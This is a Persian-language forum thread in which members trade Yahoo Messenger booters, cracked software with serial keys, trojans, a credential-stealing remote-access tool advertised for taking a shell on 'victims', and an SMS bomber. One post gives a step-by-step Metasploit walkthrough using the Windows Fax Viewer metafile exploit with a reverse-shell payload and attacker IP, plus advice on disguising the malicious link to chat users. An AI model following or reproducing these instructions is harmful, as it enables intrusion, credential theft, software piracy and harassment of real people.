اشکان جان لینکش خرابه نات فاوند میده
ولی چه ریخته خفنی داره همه چی توش پیدا میشه خودم هم میرم دنبالش ببینم پیدا میشه یا نه اگه نشد دیگه زحمتش میوفته پای خودت تا فردا شب اگه جواب ندادم و امکان اپلودش رو داشتی اپ کن
فعلا خوش باشی
Printable View
اشکان جان لینکش خرابه نات فاوند میده
ولی چه ریخته خفنی داره همه چی توش پیدا میشه خودم هم میرم دنبالش ببینم پیدا میشه یا نه اگه نشد دیگه زحمتش میوفته پای خودت تا فردا شب اگه جواب ندادم و امکان اپلودش رو داشتی اپ کن
فعلا خوش باشی
اشکان اخرین ورژن این بوتر همینه؟؟ چون من تو گوگل سرچش میکنم ورژن های 9 10 14 رو برام میاره
اره لينكش خراب شده... درست مي كنم حالا...نقل قول:
نوشته شده توسط sina88
خداي بوتر هاست.. البته هستن باز چيزاي مورد علاقه من...
نمي دونم جديدن كدوم ورژنش رو كاره اما اگه مجانيش و گير بياري خوش شانسي... ضمنا اينجا هم بزار كه بچه ها استفاده كنن.نقل قول:
اشکان اخرین ورژن این بوتر همینه؟؟ چون من تو گوگل سرچش میکنم ورژن های 9 10 14 رو برام میاره
مشكل من الان اين هستش كه لينكا اكثرشون باز نميشه
من ورژن کرک شده ی این رو داون کردم اما بوت ها رو لاگین نمیکنه یه ورژن دیگه هم دانلود کردم که یه فایل setup داره اما نورتون اونو ویروس تشخیص میده ونمیزاره نصب کنم
این برنامه نیاز به نصب شدن داره؟؟
منظورت چيه اين لينك ها اكثرشون باز نميشه؟ يعني نمي توني دانلود كني؟نقل قول:
نوشته شده توسط ibm_dark
نه اين نيازي به نصب نداره ... من توي برنامه هام داشتم اما اينقده من سي دي دارم كه نمي دونم كدومشونه... :tongue:نقل قول:
من ورژن کرک شده ی این رو داون کردم اما بوت ها رو لاگین نمیکنه یه ورژن دیگه هم دانلود کردم که یه فایل setup داره اما نورتون اونو ویروس تشخیص میده ونمیزاره نصب کنم
این برنامه نیاز به نصب شدن داره؟؟
با سلام خدمت آقا اشکان عزيز
تاپيک بسيار خوبيه اما يک مشکلي هست تمام لينک هايي که مربوط به سايت [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ] گذاشتيد براي دانلود نرم افزارهاي يوزر و پسورد لازم داره چندتا از دوستان ديگم اين مشکا را داشتند اما من پاسخي نديدم کسي داده باشه.
لينکي هم که براي نرم افزار Multi webcam Grabber قرار داديدن در پست شماره 127 اين لينک هم فاقد اعتبار شده و پيغام زير را ميده.
[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]
اگر ميشه لطف کنيد و اين نرم افزار را در سايت [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ] آپلود کنيد
با تشکر
مسعود
سلام
اين سايت ميگه فابلها موجود نيست
در ضمن اگه ميشه در جاي ديگه آپ كنيد كنيد غير از رپيد شير
چند تا از نرم افزار هاي موجود در صفحه قبل رو دانلود كردم اما نمي شد باز كرد و ارور مي داد
من يه بوتر قوي مي خوام اگه ميشه برنامه و آموزش رو برام بذاريد
قبلا از زحمات آقا اشكان و ساير دوستان تشكر مي كنم
سلام... بله ظاهرا اين سايت گير داده ... اون برنامه Multi webcam Grabber رو من دانلود نكرده بودم اما سعي مي كنم پيدا كنم يه جاي ديگه اپلود كنم... دوستان ديگه هم اگه دانلود كرده بودن لطف كنن.نقل قول:
با سلام خدمت آقا اشکان عزيز
تاپيک بسيار خوبيه اما يک مشکلي هست تمام لينک هايي که مربوط به سايت [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ] گذاشتيد براي دانلود نرم افزارهاي يوزر و پسورد لازم داره چندتا از دوستان ديگم اين مشکا را داشتند اما من پاسخي نديدم کسي داده باشه.
لينکي هم که براي نرم افزار Multi webcam Grabber قرار داديدن در پست شماره 127 اين لينک هم فاقد اعتبار شده و پيغام زير را ميده.
در مورد اپلود كردن فايل ها عرض كنم كه من توي ايران نيستم ... نمي دونم كجا فيلتره كجا نيست.. لطف كنين يه جا رو كه همه توافق مي كنين بگين كه من اپلود كنم...نقل قول:
نوشته شده توسط royaye_talkh55
ممنون :)
من یه برنامه می خوام که تو یاهو هم زمان بتونم.. چندتا ایدی درست کنم . و با همشون همزمان چت کنم.
ممنون....نقل قول:
نوشته شده توسط rb97
اين هم كه به نظر من بي نظيره...
لينك:
_AshKaN_hard boot life gold v9
_AshKaN_BlackBeautyv3
فعلا ... :)
Y!Tunnle Pro V1.3 Built232 + serial
Y! Tunnel Pro
نرم افزار Y!Tunnel تقریبا معروفترین و قوی ترین نرم افزار کاربردی در ضمیه کمک به تمامی کاربران یاهو مسنجر است.
این نرم افزار توسط شیوه های خاص و ترفندهایی بسیار جالب امکاناتی از قبیل:
- مدیریت IM ها
- امکان جلوگیری از بوت شدن
- بستن راه MailBomber ها
- جلوگیری از ارسال E-Mail های مشکوک
- کنترل Voice در چت روم ها
- جلوگیری از انجام فرمانهای یاهو مثلinvite P30RooT/ که برای بیرون انداختن افراد مزاحم از چت روم ها استفاده می شود !
- و ...
بسیاری از کاربران حرفه ای و مبتدی از این نرم افزار استفاده می کنند و به خاطر استفاده و طرز کار ساده آن، استفاده از آن را توصیه می کنیم.
دانلود - 622 کلیوبایت
serial: r7sc8-q13smf-gs9qs2-wugsye-k3x4ss
[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ] [-----------.com].zip
inam 2 ta barname vase ---- yani 2 no terojan khob va alyنقل قول:
نوشته شده توسط Numb
mamnon az dostane gholam
اين ارور رو ميده خواهشا رسيدگي كنيد :
خطای404: " صفحه مورد نظر شما در حال حاضر موجود نمیباشد
کوچولو اون تروجان دومی به برنامه ی قبلی که گزاشتی (magic login)متصل شده بود میشه بگی tak_ps اونجا چیکار داشت؟؟
سلام به تمامي دوستان عزيز يه مدت نبودم .اشكان جان اون دوتايي كه آپلود كردي رو امتحان كن هيچكدوم دانلود نميشه .يه زحمت بكش اصلاحش كن چون خيلي دونبال اون هارد بوت ميكشتم با تشكر اميد
با اجازه ی دوستان من لینک این بوتر رو میزارم که کرک شده هستش ولی به صورت exe هستش و نصب میشه بعد کرکش کار میکنه همون طور که قبلا هم گفتم انتی موقع نصب اونو تروجا تشخیص میده ولی تحقیق کردم و فهمیدم که تروجان نیست
حالا اگه خواستین تست کنین من که تا حالا مشکلی باهاش نداشتم انتی رو هم فعال کردم و دیگه گیر نمیده
ولی همچی قوی هم نیستش
راستی اخرین ورژن رو هم اگه میدونین بگین
سلام دوست مننقل قول:
نوشته شده توسط piishii
اين لينك رو امتحان كنيد حتما جواب ميده
کد:http://-----------.com/filez/3/2006/03/appz/YTunnelProBuild232-[-----------.com].zip
البته یادتون باشه این لینک رو کپی کنید و در دانلود منیجرتون بزارید مثلا ( IDM )
موفق باشید
یا حق
سلام
این رو مسنجر 7.5 هم جواب میده؟؟ چون من یه ورژنش رو داون کردم با مسنجر جدید مشکل داشت
ادغام شد تاپيك
Mr Ashkan Very Good
سلام
دوستانی که دنبال سریال واسه یاهو تونل بودن اینو تست کنن فک کنم جواب بده من یه بار امحان کردم کار میکرد البته دو هفته قبل
jnet5-ent933-cfby5r-6u2a34-72rf6k
این یه ایکون چنجر
و یه سرس ایکون توپ
خوراک تروجان
اقا ممنون..نقل قول:
نوشته شده توسط koochooloo
من اینو داشتم.......
یه برنامه ای با یه مسنجر بشه این کارو کرد نه با باز کردن چند تا مسنجر.......
اميد عزيز ...نقل قول:
.اشكان جان اون دوتايي كه آپلود كردي رو امتحان كن هيچكدوم دانلود نميشه .يه زحمت بكش اصلاحش كن چون خيلي دونبال اون هارد بوت ميكشتم با تشكر اميد
لينك ها رو تست كردم هر دوشون كار مي كنن:
نحوه دانلود رو گزاشتم كه ببينين:
I'm Glad U Like iT.نقل قول:
Mr Ashkan Very Good
با كدوم تاپيك ادغام شد؟ :blush: نگرفتم...نقل قول:
ادغام شد تاپيك
سعيد از عكس تو امضات خوشم مياد ;) .
:)
من يه برنامه براي هك ايدي ميخواهم مرسي
قابل شمارو نداره. اگه بخواي ميدم به شما [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]نقل قول:
نوشته شده توسط *AshKaN*
اگه تو اين تاپيكو يه كم بگردي ميتوني پيداكني [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]نقل قول:
نوشته شده توسط signal2006
اقا اشکان من همه اینها رو گشتم اما چند تایی رو که دانلود کردم کار نمیکردن اگه میشه یه سالمشو بزارین مرسی
سيگنال جون چه جور چيزي مد نظرته؟
كدوم هارو منظورته كه كار نمي كردن بوتر ها؟نقل قول:
نوشته شده توسط signal2006
چه نوع error به شما مي ده... فايل كم داره؟
نسخه جديد برنامه ي iRcHaTaN Ps كه مانند نسخه قبلي در ياهو 7 كار ميكنيد البته با قابليت هاي جديد مثل ارسال (user,pass,number) كارت اينترنتي | dial up password و گرفتن شل( دسترسي كامل به كاميوتر قرباني)
در اين نسخه از برنامه قابليت ارسال password كارت هاي اينترنتي افزوده شده و هم چنين شما در اين نسخه ميتوانيد از قرباني شل بگيريد و كنترل كامل سيستم قرباني را به عهده بگيريد و هم چنين قابليت ارسال email با سيستم injection افزوده شده كه مي تواند از فايروال نيز عبور كرده و ايميل ارسال كند .pm ارسالي در اين نسخه توسط قرباني قابل رويت نيست و شما مي توتانيد از 2 mode ايميل و pm هم زمان استفاده كنيد .حتي اگر قرباني ياهو مسنجر نداشته باشد password كارت اينترت او براي شما ارسال مي شود و هم چنين مي توانيد از وي شل بگيريد. ديگر امكانات برنامه در عكس برنامه قابل رويت مي باشد و ما بقي در help برنامه موجود است.
هک از طریق چت بدون ازسال فایل
در متدی جدید که با باگ موجود در Windows Fax Viewer کار می کند . شما لینکی برای قربانی در چت روم می فرستید و بعد از کلیک کردن آن لینک توسط قربانی به شما از وی Shell ( قابلیت کنترل کامل کامپیوتر وی) میگیرید نوع Shell در این روش از نوع Reverse می باشد و فابلیت عبور از ّFirewall را دارا ست .ابزار لازم در این کار همان Metasploit است که مجموعه باگ هاو ابزار های نفوذ می باشد
Metasploit framework
توجه : اگر قبلآ نسخه Metasploit framework-2.4 را دریافت کرده اید این باگ هنوز به آن اضافه نشده و شما بایستی در پوشه برنامه MSFupdate را بزنید تا باگ های جدید مانند ie_xp_pfv_metafile به آن اضافه شود. برای کنترل صحت update می توانید بعد از اجرای برنامه دستور show exploits را بزنید و لیست باگ ها را مشاهده و با دستور use از آن ها استفاده کنید بنابراین تایپ می کنید use ie_xp_pfv_metafile حال شما این exploit را اجرا کرده اید و بایستی یک سری مقادیر را به برنامه بدهید مانند ip شما و پورت کاربردی . نوع سیستم عامل قربانی . نوع payload (ارتباط ) . دراین با فرض اینکه ip من [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ] باشد به برنامه مقدار دهی میکنم . بزنید set TARGET 0 و بعد آن بزنید set PAYLOAD win32_reverse و بعد ان
بزنید set HTTPHOST 217.216.30.40 و بعد آن
بزنید set LHOST 217.216.30.40
و در آخر بزنید exploit . حال برنامه یک لینک از ip شما به شما می دهد که در اینجا به من لینک [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ] را می دهد و منتظر ارتباط با قربانی می ایستد . با کلیک قربانی روی این لینک شما در این برنامه shell از سیستم وی را مشاهده خواهید نمود .شما در این shell قادر به اجرای همه گونه فرمان بر روی سیستم قربانی می باشید به طور مثال Format یک درایو و پاک کردن فایل ها توسط دستورات dos. و انگار از سیستم قربانی وارد cmd شده اید . برای ارسال و گرفتن فایل هم می توانید به مقاله ی آموزشی که در سایت قرار داده شده رجوع کنید -
چون قربانی ممکن است به لینک شما شک کند و چون اینک ip شما است روی ان کلیک نکند .شما می توانید یک صفحه ی html از یک سایت به طور مثال یک صفحه از یک سایت .گالری عکس . جک و ... را save کنید و آن را با note pad باز کرده و کد زیر را در چند خط قبل انتهای آن past کنید.
موفق باشيد. :)
نسخه جدید V 2.0 . iRcHaTaN Sms BOmber که مانند نسحه ی فبلی قابلیت ارسال sms به تعداد زیاد به طور مجانی را دارد . تنها کافی است که شماره موبایل قربانی را وارد کرده bomb را بزنید تا به تعداد مشخص شده توسط شما برایش sms بفرستد. متن این sms ها مانند نسخه ی قبلی عدد بوده و قابل تغیر نیست و برای مدت محدودی کارایی دارد .ممکن است sms ها با یک فاصله زمانی کم یک جا ارسال شوند
موفق باشيد. :) (نه در خراب كردن موبايل مردم... در زندگي تون :laughing: )
من امتحان کردم کار نکردنقل قول:
نوشته شده توسط *AshKaN*
کسی از این برنامه نتیجه گرفته ؟
رو كدوم بد بخت امتحان كردي؟ :laughing: :blink:نقل قول:
نوشته شده توسط papiyoon
من هم رو خودم امتحان کردم کار نکرد البته ایران نیستم نمیدونم این محدودیت رو داره یا نه
دوستان راهی سراغ دارین که بشه تشخیص داد لینکی که واست pm دادن ویروسی هستشیا به فایل سرور متصل شده؟؟
قبلا با نگاه کردن به لینک و دیدن ای پی جای اسم سایت میشد حدس زد ولی یه جا خوندم که میشه اینو هم دور زد یعنی کاری کرد که ای پی نشون نده بلکه ادرس یه سایت باشه
روی شماره خودم امتحان کردم دریغ از 1 دونه sms :laughing: :laughing:نقل قول:
نوشته شده توسط *AshKaN*
اقا اشکان مثلا این irchatan-ps 7.1 را كه گذاشتي همه كاراشو ميكنم اين پيغام رو ميده server created successfully اگه ميشه بگين چكار كنم مرسي